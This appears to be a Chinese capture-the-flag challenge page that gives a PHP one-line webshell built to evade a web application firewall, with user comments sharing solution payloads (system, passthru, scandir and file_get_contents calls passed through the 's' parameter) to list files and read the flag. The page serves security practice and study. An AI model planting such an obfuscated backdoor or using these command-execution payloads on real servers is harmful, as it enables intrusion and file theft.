shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6515
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
xclay 2年前

这题告诉我们,学什么渗透,直接猜开发者留下的接口就可以了

回复 4

2224525664 2年前

没有提示的话这题是不是就做不出来了?

回复 1

Miludear 2年前

不懂语法的可直接参考 https://blog.csdn.net/changer_we/article/details/89304399 大佬的文章,很不错,简单易懂!

回复 2

zmcck 2年前

assert(s) ?s=system("ls") ?s=system("cat flag***.txt")

回复 0

17695688750 2年前

命令执行漏洞,我以为s和url间隔要用/隔开,没想到要用?隔开,淦

回复 0

XD6 2年前

有点蠢

回复 0

bright0flavor 2年前

①var_dump(scandir('./')) ②var_dump(file_get_contents('flaga15808abee46a1d5.txt'))

回复 1

笨笨笨蛋 3年前

构造system函数

回复 0

灵梦归希 3年前

过狗参数:passthru('cat%20flaga15808abee46a1d5.txt')

回复 0

lysandria 3年前

现在只能用这个s=print_r(scandir('./')),其他system等都不能用了,写php代码也不行。

回复 1
yemur 3年前

system()能用,我就是用system解决的

回复 0

WriteUp

image
harry

3 金币

评分(9)

解题动态

szb123 攻破了该题 2小时前
17361232956 攻破了该题 3小时前
皮蛋瘦肉粥 攻破了该题 4小时前
aaa1 攻破了该题 5小时前
初入CTF联盟 攻破了该题 7小时前
hahahahahahaha 攻破了该题 8小时前
GEcharacter 攻破了该题 8小时前
wujiayi 攻破了该题 11小时前
huangfeiyu 攻破了该题 13小时前
晚霞难掩秋色 攻破了该题 13小时前
Julia 攻破了该题 23小时前
hanzkj 攻破了该题 1天前
920917544 攻破了该题 1天前
codegod 攻破了该题 1天前
foxkiller 攻破了该题 1天前
desireart 攻破了该题 1天前
Ywctf 攻破了该题 1天前
orange2015 攻破了该题 1天前
刚哥glory 攻破了该题 1天前
2757547892 攻破了该题 2天前
问题反馈